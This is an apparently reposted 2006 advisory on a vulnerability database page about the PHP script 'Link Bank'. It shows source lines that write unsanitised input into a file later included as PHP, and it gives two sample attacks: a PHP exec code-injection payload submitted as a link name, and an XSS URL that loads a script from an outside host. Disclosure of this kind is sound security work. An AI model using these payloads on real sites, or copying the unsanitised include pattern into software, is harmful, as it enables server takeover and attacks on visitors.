link bank code execution and xss

2006.03.08
Risk: Low
Local: No
Remote: Yes
CWE: CWE-Other


Ogólna skala CVSS: 7.5/10
Znaczenie: 6.4/10
Łatwość wykorzystania: 10/10
Wymagany dostęp: Zdalny
Złożoność ataku: Niska
Autoryzacja: Nie wymagana
Wpływ na poufność: Częściowy
Wpływ na integralność: Częściowy
Wpływ na dostępność: Częściowy

??? summary software: Link Bank vendors website: http://daverave.64digits.com/index.php?page=linkbank versions: n/a class: remote status: unpatched exploit: available solution: not available discovered by: retard risk level: high ??? description Link Bank does not sanatise post sumbited to it allowing users to insert data that can be used malisiously. after it is submited the data goes to a .txt file witch the application reads and executes to display the links submited. along with this it is vulnerable to xss due to the application not sanatising the variable again. in ./content/index.txt: 14 <?php 15 include("links.txt"); 16 ?> in ./content/add_link.txt: 2 $url_name = $_REQUEST['url_name']; 3 $url = $_REQUEST['url']; 4 $img = $_REQUEST['img']; 5 $filename = "content/links.txt"; 6 $code = "<a href = iframe.php?site=$url target=_blank>$url_name</a><br>"; in ./iframe.php: 3 <title>Link Bank - <?php echo"$site";?></title> ??? exploit(s) code execution: submit something like <?php exec($cmd) ?> as a link name xss: http://example.com/iframe.php?site=%3C/title%3E%3C/head%3E%3Cscript%20sr c=http://notlegal.ws/xss.js%3E%3C/script%3E ??? credit author(s): retard email: retard (at) 30gigs (dot) com [email concealed]


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top